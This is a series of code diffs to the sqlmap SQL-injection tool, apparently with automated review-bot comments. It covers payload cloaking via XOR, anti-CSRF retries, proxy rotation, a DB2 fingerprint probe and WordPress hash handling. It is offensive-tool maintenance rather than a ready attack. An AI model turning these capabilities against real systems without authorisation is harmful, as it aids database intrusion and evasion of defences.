||||||
if data is None:
|
if data is None:
|
||||||
with open(inputFile, "rb") as f:
|
with open(inputFile, "rb") as f:
|
||||||
data = f.read()
|
data = f.read()
|
||||||
|
|
||||||
return hideAscii(zlib.compress(data))
|
return xor(zlib.compress(data), KEY)
|
||||||
|
|
||||||
def decloak(inputFile=None, data=None):
|
def decloak(inputFile=None, data=None):
|
||||||
if data is None:
|
if data is None:
|
||||||
with open(inputFile, "rb") as f:
|
with open(inputFile, "rb") as f:
|
||||||
data = f.read()
|
data = f.read()
|
||||||
try:
|
try:
|
||||||
data = zlib.decompress(hideAscii(data))
|
data = zlib.decompress(xor(data, KEY))
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
print(ex)
|
print(ex)
|
||||||
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
|
print('ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile)
|
||||||
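Review bot: `ord = lambda _: _` rebinds the builtin for the whole module on Python 3, so any later `ord()` on a str in this file would silently hand back the str instead of an int; the replaced `hideAscii` handled the 2/3 difference per element rather than by shadowing. `xor` can avoid the rebinding entirely by iterating a `bytearray`, which yields ints on both interpreters: `key = bytearray(key)` followed by `return bytes(bytearray(b ^ key[i % len(key)] for i, b in enumerate(bytearray(message))))`, after which the `ord =` line can be dropped. A fixed module-level `KEY` also makes this a reversible transformation rather than encryption, which is worth stating above the constant, e.g. `# Note: fixed-key XOR; reversible by anyone holding this script, so this hides content, it does not protect it`. The enclosing `decloak` continues past the end of the hunk.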
@@ -52,7 +50,7 @@ def decloak(inputFile=None, data=None):
|
|||||||
|
|
||||||
def main():
|
def main():
|
||||||
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
||||||
parser = OptionParser(usage=usage, version='0.1')
|
parser = OptionParser(usage=usage, version='0.2')
|
||||||
|
|
||||||
try:
|
try:
|
||||||
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
||||||
|
|||||||

@@ -336,6 +336,10 @@ def start():
|
|||||||
conf.httpHeaders.append((header, value))
|
conf.httpHeaders.append((header, value))
|
||||||
break
|
break
|
||||||
|
|
||||||
|
if conf.data:
|
||||||
|
# Note: explicitly URL encode __ ASP(.NET) parameters (e.g. to avoid problems with Base64 encoded '+' character) - standard procedure in web browsers
|
||||||
|
conf.data = re.sub(r"\b(__\w+)=([^&]+)", lambda match: "%s=%s" % (match.group(1), urlencode(match.group(2), safe='%')), conf.data)
|
||||||
|
|
||||||
conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
|
conf.httpHeaders = [conf.httpHeaders[i] for i in xrange(len(conf.httpHeaders)) if conf.httpHeaders[i][0].upper() not in (__[0].upper() for __ in conf.httpHeaders[i + 1:])]
|
||||||
|
|
||||||
initTargetEnv()
|
initTargetEnv()
|
||||||
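Review bot: The added `re.sub` re-encodes every `__`-prefixed value in `conf.data` through `urlencode(..., safe='%')`, which turns a literal `+` into `%2B`; in an application/x-www-form-urlencoded body that was pasted already encoded, `+` stands for a space, so a value such as `__EVENTARGUMENT=a+b` changes meaning after this rewrite, while the Base64 `__VIEWSTATE` case the comment targets is fixed. Because `safe='%'` leaves existing percent-escapes alone the rewrite is otherwise idempotent, so the `+` ambiguity is the one behaviour users can be surprised by; the existing comment should say so, e.g. `# Note: '+' in such values is taken as a literal plus (Base64), not as an encoded space`, or the rewrite could be limited to values that actually contain Base64-only characters. `start()` continues outside the hunk.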
|
|||||||
@@ -172,7 +172,7 @@ class Agent(object):
|
|||||||
|
|
||||||
newValue = "%s%s" % (value, newValue)
|
newValue = "%s%s" % (value, newValue)
|
||||||
|
|
||||||
newValue = self.cleanupPayload(newValue, origValue)
|
newValue = self.cleanupPayload(newValue, origValue) or ""
|
||||||
|
|
||||||
if base64Encoding:
|
if base64Encoding:
|
||||||
_newValue = newValue
|
_newValue = newValue
|
||||||
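Review bot: `self.cleanupPayload(newValue, origValue) or ""` silently turns a `None` result into an empty payload, but nothing on the line says when `cleanupPayload()` returns `None` or why an empty value is the right substitute, so the `or ""` reads like a defensive guess rather than a decision. A one-line comment would fix that, e.g. `# Note: cleanupPayload() can return None in <case - fill in>; fall back to an empty payload so the encoding branches below always see a str`. The enclosing method starts and ends outside the hunk.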
|
|||||||
@@ -116,6 +116,7 @@ from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
|||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
||||||
from lib.core.settings import DEV_EMAIL_ADDRESS
|
from lib.core.settings import DEV_EMAIL_ADDRESS
|
||||||
|
from lib.core.settings import DOLLAR_MARKER
|
||||||
from lib.core.settings import DUMMY_USER_INJECTION
|
from lib.core.settings import DUMMY_USER_INJECTION
|
||||||
from lib.core.settings import DYNAMICITY_BOUNDARY_LENGTH
|
from lib.core.settings import DYNAMICITY_BOUNDARY_LENGTH
|
||||||
from lib.core.settings import ERROR_PARSING_REGEXES
|
from lib.core.settings import ERROR_PARSING_REGEXES
|
||||||
@@ -2865,6 +2866,8 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
|
|||||||
result = None if value is None else ""
|
result = None if value is None else ""
|
||||||
|
|
||||||
if value:
|
if value:
|
||||||
|
value = re.sub(r"\b[$\w]+=", lambda match: match.group(0).replace('$', DOLLAR_MARKER), value)
|
||||||
|
|
||||||
if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):
|
if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):
|
||||||
warnMsg = "if you experience problems with "
|
warnMsg = "if you experience problems with "
|
||||||
warnMsg += "non-ASCII identifier names "
|
warnMsg += "non-ASCII identifier names "
|
||||||
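Review bot: The `$`-protection added on the `re.sub` line depends on `DOLLAR_MARKER` surviving `_urllib.parse.quote()` unchanged so that the `result.replace(DOLLAR_MARKER, '$')` in the following hunk (after the `spaceplus` handling) can find it; that holds only if every character of the marker is unreserved or in `safe`, which cannot be verified from this diff. A comment on the substitution line would pin the requirement, e.g. `# Note: DOLLAR_MARKER must consist only of characters quote() never escapes, otherwise the replace-back below misses it`. Conversely, an input that already contains the marker text is rewritten to `$` on the way out, which is acceptable only if the marker is chosen to be unambiguous; a doctest on `urlencode` with a `name$sub=v` input would document the intended round-trip.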
@@ -2899,6 +2902,8 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
|
|||||||
if spaceplus:
|
if spaceplus:
|
||||||
result = result.replace(_urllib.parse.quote(' '), '+')
|
result = result.replace(_urllib.parse.quote(' '), '+')
|
||||||
|
|
||||||
|
result = result.replace(DOLLAR_MARKER, '$')
|
||||||
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
def runningAsAdmin():
|
def runningAsAdmin():
|
||||||
@@ -4123,6 +4128,7 @@ def safeSQLIdentificatorNaming(name, isTable=False):
|
|||||||
|
|
||||||
# Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf)
|
# Note: SQL 92 has restrictions for identifiers starting with underscore (e.g. http://www.frontbase.com/documentation/FBUsers_4.pdf)
|
||||||
if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
|
if retVal.upper() in kb.keywords or (not isTable and (retVal or " ")[0] == '_') or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ('.' if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
|
||||||
|
if not conf.noEscape:
|
||||||
retVal = unsafeSQLIdentificatorNaming(retVal)
|
retVal = unsafeSQLIdentificatorNaming(retVal)
|
||||||
|
|
||||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
|
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS, DBMS.CUBRID, DBMS.SQLITE): # Note: in SQLite double-quotes are treated as string if column/identifier is non-existent (e.g. SELECT "foobar" FROM users)
|
||||||
|
|||||||
@@ -198,8 +198,20 @@ def decodeBase64(value, binary=True, encoding=None):
|
|||||||
True
|
True
|
||||||
>>> decodeBase64("MTIz", binary=False)
|
>>> decodeBase64("MTIz", binary=False)
|
||||||
'123'
|
'123'
|
||||||
|
>>> decodeBase64(b"MTIzNA") == b"1234"
|
||||||
|
True
|
||||||
|
>>> decodeBase64("MTIzNA") == b"1234"
|
||||||
|
True
|
||||||
|
>>> decodeBase64("MTIzNA==") == b"1234"
|
||||||
|
True
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
padding = b'=' if isinstance(value, bytes) else '='
|
||||||
|
|
||||||
|
# Reference: https://stackoverflow.com/a/49459036
|
||||||
|
if not value.endswith(padding):
|
||||||
|
value += 3 * padding
|
||||||
|
|
||||||
retVal = base64.b64decode(value)
|
retVal = base64.b64decode(value)
|
||||||
|
|
||||||
if not binary:
|
if not binary:
|
||||||
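Review bot: The padding fix only triggers when the input ends without `=`, so a value with too few pad characters (`MTIzNA=`, one `=` where two are needed) still reaches `base64.b64decode` unchanged and fails with `Incorrect padding`, while appending three `=` to unpadded input relies on the decoder discarding surplus padding. Normalising the padding instead covers both cases without that reliance: `value = value.rstrip(padding)` followed by `value += padding * (-len(value) % 4)` (assuming no embedded whitespace, which the existing doctests do not use). A doctest such as `>>> decodeBase64("MTIzNA=") == b"1234"` would pin the partially padded case. `decodeBase64` continues beyond the hunk.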
|
|||||||
@@ -15,6 +15,7 @@ _defaults = {
|
|||||||
"delay": 0,
|
"delay": 0,
|
||||||
"timeout": 30,
|
"timeout": 30,
|
||||||
"retries": 3,
|
"retries": 3,
|
||||||
|
"csrfRetries": 0,
|
||||||
"saFreq": 0,
|
"saFreq": 0,
|
||||||
"threads": 1,
|
"threads": 1,
|
||||||
"level": 1,
|
"level": 1,
|
||||||
|
|||||||
@@ -93,7 +93,6 @@ from lib.core.exception import SqlmapInstallationException
|
|||||||
from lib.core.exception import SqlmapMissingDependence
|
from lib.core.exception import SqlmapMissingDependence
|
||||||
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
from lib.core.exception import SqlmapMissingMandatoryOptionException
|
||||||
from lib.core.exception import SqlmapMissingPrivileges
|
from lib.core.exception import SqlmapMissingPrivileges
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
|
||||||
from lib.core.exception import SqlmapSilentQuitException
|
from lib.core.exception import SqlmapSilentQuitException
|
||||||
from lib.core.exception import SqlmapSyntaxException
|
from lib.core.exception import SqlmapSyntaxException
|
||||||
from lib.core.exception import SqlmapSystemException
|
from lib.core.exception import SqlmapSystemException
|
||||||
@@ -984,13 +983,10 @@ def _setHTTPHandlers():
|
|||||||
|
|
||||||
with kb.locks.handlers:
|
with kb.locks.handlers:
|
||||||
if conf.proxyList is not None:
|
if conf.proxyList is not None:
|
||||||
if not conf.proxyList:
|
|
||||||
errMsg = "list of usable proxies is exhausted"
|
|
||||||
raise SqlmapNoneDataException(errMsg)
|
|
||||||
|
|
||||||
conf.proxy = conf.proxyList[0]
|
conf.proxy = conf.proxyList[0]
|
||||||
conf.proxyList = conf.proxyList[1:]
|
conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1]
|
||||||
|
|
||||||
|
if len(conf.proxyList) > 1:
|
||||||
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
|
infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
|||||||
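Review bot: Removing the "list of usable proxies is exhausted" stop from _setHTTPHandlers leaves no terminating condition once `conf.proxyList` is rotated in place: if every proxy in the file is dead and the caller re-enters this path on each failure (that code is outside the hunk), sqlmap keeps cycling through the same unusable entries. Keep a bound, for example count rotations since the last completed request and raise the previous error after one full pass (`len(conf.proxyList)` rotations), which would also let the now-deleted `SqlmapNoneDataException` import stay. Where that counter is reset on success depends on the failure handler, so treat the exact placement as to be confirmed. The `len(conf.proxyList) > 1` guard around the info message is fine for a single-entry list.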
@@ -61,6 +61,7 @@ optDict = {
|
|||||||
"csrfToken": "string",
|
"csrfToken": "string",
|
||||||
"csrfUrl": "string",
|
"csrfUrl": "string",
|
||||||
"csrfMethod": "string",
|
"csrfMethod": "string",
|
||||||
|
"csrfRetries": "integer",
|
||||||
"forceSSL": "boolean",
|
"forceSSL": "boolean",
|
||||||
"chunked": "boolean",
|
"chunked": "boolean",
|
||||||
"hpp": "boolean",
|
"hpp": "boolean",
|
||||||
|
|||||||
@@ -18,7 +18,7 @@ from lib.core.enums import OS
|
|||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.4.6.0"
|
VERSION = "1.4.7.0"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
@@ -69,6 +69,7 @@ REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
|||||||
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||||
SAFE_VARIABLE_MARKER = "__SAFE__"
|
SAFE_VARIABLE_MARKER = "__SAFE__"
|
||||||
SAFE_HEX_MARKER = "__SAFE_HEX__"
|
SAFE_HEX_MARKER = "__SAFE_HEX__"
|
||||||
|
DOLLAR_MARKER = "__DOLLAR__"
|
||||||
|
|
||||||
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||||
@@ -605,7 +606,7 @@ BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
|||||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
SHELLCODEEXEC_RANDOM_STRING_MARKER = b"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||||
|
|
||||||
# Period after last-update to start nagging about the old revision
|
# Period after last-update to start nagging about the old revision
|
||||||
LAST_UPDATE_NAGGING_DAYS = 60
|
LAST_UPDATE_NAGGING_DAYS = 180
|
||||||
|
|
||||||
# Minimum non-writing chars (e.g. ['"-:/]) ratio in case of parsed error messages
|
# Minimum non-writing chars (e.g. ['"-:/]) ratio in case of parsed error messages
|
||||||
MIN_ERROR_PARSING_NON_WRITING_RATIO = 0.05
|
MIN_ERROR_PARSING_NON_WRITING_RATIO = 0.05
|
||||||
|
|||||||
@@ -267,6 +267,9 @@ def cmdLineParser(argv=None):
|
|||||||
request.add_argument("--csrf-method", dest="csrfMethod",
|
request.add_argument("--csrf-method", dest="csrfMethod",
|
||||||
help="HTTP method to use during anti-CSRF token page visit")
|
help="HTTP method to use during anti-CSRF token page visit")
|
||||||
|
|
||||||
|
request.add_argument("--csrf-retries", dest="csrfRetries", type=int,
|
||||||
|
help="Retries for anti-CSRF token retrieval (default %d)" % defaults.csrfRetries)
|
||||||
|
|
||||||
request.add_argument("--force-ssl", dest="forceSSL", action="store_true",
|
request.add_argument("--force-ssl", dest="forceSSL", action="store_true",
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
|
|||||||
@@ -1045,6 +1045,8 @@ class Connect(object):
|
|||||||
auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
|
auxHeaders[value.split(',')[0]] = value.split(',', 1)[-1]
|
||||||
|
|
||||||
if conf.csrfToken:
|
if conf.csrfToken:
|
||||||
|
token = AttribDict()
|
||||||
|
|
||||||
def _adjustParameter(paramString, parameter, newValue):
|
def _adjustParameter(paramString, parameter, newValue):
|
||||||
retVal = paramString
|
retVal = paramString
|
||||||
|
|
||||||
@@ -1061,7 +1063,15 @@ class Connect(object):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
token = AttribDict()
|
for attempt in xrange(conf.csrfRetries + 1):
|
||||||
|
if token:
|
||||||
|
break
|
||||||
|
|
||||||
|
if attempt > 0:
|
||||||
|
warnMsg = "unable to find anti-CSRF token '%s' at '%s'" % (conf.csrfToken._original, conf.csrfUrl or conf.url)
|
||||||
|
warnMsg += ". sqlmap is going to retry the request"
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.csrfMethod or (conf.method if conf.csrfUrl == conf.url else None), cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||||
page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...')
|
page = urldecode(page) # for anti-CSRF tokens with special characters in their name (e.g. 'foo:bar=...')
|
||||||
|
|
||||||
|
|||||||
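Review bot: `for attempt in xrange(conf.csrfRetries + 1)` runs zero times when `--csrf-retries` is negative, which argparse's `type=int` accepts, so the anti-CSRF page is never fetched and `token` stays empty without any message. Clamp at the loop, `for attempt in xrange(max(conf.csrfRetries, 0) + 1):`, or reject negative values during option validation (outside this hunk). The retries are also issued back-to-back; a token endpoint that failed because of rate limiting is hit again immediately, so honouring `conf.delay` between attempts would be worth considering. The enclosing method starts and ends outside the hunk, including the code that parses `token` out of `page` after `urldecode`.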
@@ -484,7 +484,7 @@ def vbulletin_passwd(password, salt, **kwargs):
|
|||||||
def wordpress_passwd(password, salt, count, prefix, **kwargs):
|
def wordpress_passwd(password, salt, count, prefix, **kwargs):
|
||||||
"""
|
"""
|
||||||
Reference(s):
|
Reference(s):
|
||||||
http://packetstormsecurity.org/files/74448/phpassbrute.py.txt
|
https://web.archive.org/web/20120219120128/packetstormsecurity.org/files/74448/phpassbrute.py.txt
|
||||||
http://scriptserver.mainframe8.com/wordpress_password_hasher.php
|
http://scriptserver.mainframe8.com/wordpress_password_hasher.php
|
||||||
|
|
||||||
>>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp')
|
>>> wordpress_passwd(password='testpass', salt='aD9ZLmkp', count=2048, prefix='$P$9aD9ZLmkp')
|
||||||
|
|||||||
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
|
|||||||
import imp
|
import imp
|
||||||
import logging
|
import logging
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
import sys
|
import sys
|
||||||
import traceback
|
import traceback
|
||||||
import warnings
|
import warnings
|
||||||
@@ -41,7 +42,12 @@ def getSafeExString(ex, encoding=None): # Cross-referenced function
|
|||||||
class SQLAlchemy(GenericConnector):
|
class SQLAlchemy(GenericConnector):
|
||||||
def __init__(self, dialect=None):
|
def __init__(self, dialect=None):
|
||||||
GenericConnector.__init__(self)
|
GenericConnector.__init__(self)
|
||||||
|
|
||||||
self.dialect = dialect
|
self.dialect = dialect
|
||||||
|
self.address = conf.direct
|
||||||
|
|
||||||
|
if self.dialect:
|
||||||
|
self.address = re.sub(r"\A.+://", "%s://" % self.dialect, self.address)
|
||||||
|
|
||||||
def connect(self):
|
def connect(self):
|
||||||
if _sqlalchemy:
|
if _sqlalchemy:
|
||||||
@@ -52,18 +58,15 @@ class SQLAlchemy(GenericConnector):
|
|||||||
if not os.path.exists(self.db):
|
if not os.path.exists(self.db):
|
||||||
raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db)
|
raise SqlmapFilePathException("the provided database file '%s' does not exist" % self.db)
|
||||||
|
|
||||||
_ = conf.direct.split("//", 1)
|
_ = self.address.split("//", 1)
|
||||||
conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db))
|
self.address = "%s////%s" % (_[0], os.path.abspath(self.db))
|
||||||
|
|
||||||
if self.dialect:
|
|
||||||
conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1)
|
|
||||||
|
|
||||||
if self.dialect == "sqlite":
|
if self.dialect == "sqlite":
|
||||||
engine = _sqlalchemy.create_engine(conf.direct, connect_args={"check_same_thread": False})
|
engine = _sqlalchemy.create_engine(self.address, connect_args={"check_same_thread": False})
|
||||||
elif self.dialect == "oracle":
|
elif self.dialect == "oracle":
|
||||||
engine = _sqlalchemy.create_engine(conf.direct)
|
engine = _sqlalchemy.create_engine(self.address)
|
||||||
else:
|
else:
|
||||||
engine = _sqlalchemy.create_engine(conf.direct, connect_args={})
|
engine = _sqlalchemy.create_engine(self.address, connect_args={})
|
||||||
|
|
||||||
self.connector = engine.connect()
|
self.connector = engine.connect()
|
||||||
except (TypeError, ValueError):
|
except (TypeError, ValueError):
|
||||||
|
|||||||
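Review bot: The scheme rewrite added in `SQLAlchemy.__init__`, `re.sub(r"\A.+://", "%s://" % self.dialect, self.address)`, uses a greedy `.+` and therefore matches up to the last `://` in the connection string; a password or database path containing `://` would be swallowed into the replaced prefix. Anchor the scheme to the first separator instead: `self.address = re.sub(r"\A[^:/]+://", "%s://" % self.dialect, self.address)`, which still covers dialect names such as `mysql+pymysql`. Keeping the rewritten string in `self.address` instead of mutating `conf.direct` is an improvement; note that `self.address` holds the credentials verbatim, so it should never be logged.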
@@ -97,11 +97,20 @@ class Fingerprint(GenericFingerprint):
|
|||||||
logMsg = "confirming %s" % DBMS.DB2
|
logMsg = "confirming %s" % DBMS.DB2
|
||||||
logger.info(logMsg)
|
logger.info(logMsg)
|
||||||
|
|
||||||
version = self._versionCheck()
|
result = inject.checkBooleanExpression("JULIAN_DAY(CURRENT DATE) IS NOT NULL")
|
||||||
|
|
||||||
|
if not result:
|
||||||
|
warnMsg = "the back-end DBMS is not %s" % DBMS.DB2
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
return False
|
||||||
|
|
||||||
|
version = self._versionCheck()
|
||||||
if version:
|
if version:
|
||||||
Backend.setVersion(version)
|
Backend.setVersion(version)
|
||||||
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
|
setDbms("%s %s" % (DBMS.DB2, Backend.getVersion()))
|
||||||
|
else:
|
||||||
|
setDbms(DBMS.DB2)
|
||||||
|
|
||||||
return True
|
return True
|
||||||
else:
|
else:
|
||||||
|
|||||||
@@ -189,6 +189,9 @@ csrfUrl =
|
|||||||
# HTTP method to use during anti-CSRF token page visit.
|
# HTTP method to use during anti-CSRF token page visit.
|
||||||
csrfMethod =
|
csrfMethod =
|
||||||
|
|
||||||
|
# Retries for anti-CSRF token retrieval.
|
||||||
|
csrfRetries =
|
||||||
|
|
||||||
# Force usage of SSL/HTTPS
|
# Force usage of SSL/HTTPS
|
||||||
# Valid: True or False
|
# Valid: True or False
|
||||||
forceSSL = False
|
forceSSL = False
|
||||||
|
|||||||
4
thirdparty/identywaf/identYwaf.py
vendored
4
thirdparty/identywaf/identYwaf.py
vendored
@@ -60,7 +60,7 @@ else:
|
|||||||
HTTPCookieProcessor = urllib2.HTTPCookieProcessor
|
HTTPCookieProcessor = urllib2.HTTPCookieProcessor
|
||||||
|
|
||||||
NAME = "identYwaf"
|
NAME = "identYwaf"
|
||||||
VERSION = "1.0.124"
|
VERSION = "1.0.127"
|
||||||
BANNER = r"""
|
BANNER = r"""
|
||||||
` __ __ `
|
` __ __ `
|
||||||
____ ___ ___ ____ ______ `| T T` __ __ ____ _____
|
____ ___ ___ ____ ______ `| T T` __ __ ____ _____
|
||||||
@@ -125,7 +125,7 @@ codes = set()
|
|||||||
proxies = list()
|
proxies = list()
|
||||||
proxies_index = 0
|
proxies_index = 0
|
||||||
|
|
||||||
_exit = exit
|
_exit = sys.exit
|
||||||
|
|
||||||
def exit(message=None):
|
def exit(message=None):
|
||||||
if message:
|
if message:
|
||||||
|
|||||||
9
thirdparty/multipart/multipartpost.py
vendored
9
thirdparty/multipart/multipartpost.py
vendored
@@ -23,6 +23,7 @@ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|||||||
import io
|
import io
|
||||||
import mimetypes
|
import mimetypes
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
import stat
|
import stat
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
@@ -67,6 +68,14 @@ class MultipartPostHandler(_urllib.request.BaseHandler):
|
|||||||
request.add_unredirected_header("Content-Type", contenttype)
|
request.add_unredirected_header("Content-Type", contenttype)
|
||||||
|
|
||||||
request.data = data
|
request.data = data
|
||||||
|
|
||||||
|
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235
|
||||||
|
if request.data:
|
||||||
|
for match in re.finditer(b"(?i)\s*-{20,}\w+(\s+Content-Disposition[^\n]+\s+|\-\-\s*)", request.data):
|
||||||
|
part = match.group(0)
|
||||||
|
if b'\r' not in part:
|
||||||
|
request.data = request.data.replace(part, part.replace(b'\n', b"\r\n"))
|
||||||
|
|
||||||
return request
|
return request
|
||||||
|
|
||||||
def multipart_encode(self, vars, files, boundary=None, buf=None):
|
def multipart_encode(self, vars, files, boundary=None, buf=None):
|
||||||
|
|||||||